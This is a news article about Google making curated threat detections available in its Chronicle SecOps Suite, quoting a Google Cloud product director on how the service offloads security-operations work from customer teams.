Google Brings Curated Detections to Cloud Security Service
Google has made generally available a set of curated detections for organizations that have adopted its Chronicle SecOps Suite.
Chris Corde, director of product management for security at Google Cloud, said those detections are the first in a series of ongoing updates that will increasingly shift more responsibility for security operations to the cloud service provider.
The detections, built by the Google Cloud Threat Intelligence (GCTI) research team, identify ransomware attacks, remote access tools (RAT), infostealers aimed at Windows platforms along with data exfiltration and other types of suspicious network activity. As Chronicle SecOps Suite continues to evolve, Google will add additional capabilities to detect a wider range of attack vectors over the next 12 to 24 months, said Corde.
The detections provided by Google will align with the MITRE ATT&CK framework to make it simpler to both understand adversary tactics and techniques and uncover potential gaps in defenses, he added.
The Chronicle SecOps Suite was created to eliminate the need for security operations teams to deploy and maintain their own security information event management (SIEM) platform, said Corde. Too many cybersecurity teams are devoting time and resources to security operations at the expense of finding threats and remediating vulnerabilities, he noted.
Chronicle SecOps Suite, in effect, enables organizations to rely on Google to manage security operations on their behalf by, for example, eliminating the need for cybersecurity teams to write and continuously update rule sets, Corde explained. It also gives organizations the option to tune the alerts it generates using either a standard mode or a precision mode that provides higher-fidelity insights that generate more alerts, he noted.
It’s not clear how willing organizations will be to essentially outsource security operations, but as threats increase both in volume and sophistication more organizations are struggling to find the resources required to defend themselves. Many cybersecurity platforms and tools are never used simply because there isn’t enough available expertise to deploy and maintain them.
Cybersecurity, at its core, has always been a big data challenge that consumes substantial compute and storage resources, said Corde. One of the advantages of Chronicle SecOps Suite is that all the data collected is already normalized, he added. In contrast, organizations that deploy their own SIEM have to normalize all the data collected on their own, noted Corte.
In general, security operations platforms are migrating to the cloud because it is easier to secure a distributed computing environment via a centralized control plane. In the wake of the COVID-19 pandemic, it’s become more apparent that cybersecurity teams need to be able to access tools and platforms from wherever they are at any time of day. Cybercriminals, after all, are liable to strike when they believe the fewest number of cybersecurity professionals are able to respond.
Time, of course, is of the essence when any cyberattack is discovered. The issue organizations need to evaluate is just how much damage can be done between when they suspect an attack and when they can actually do something about it.
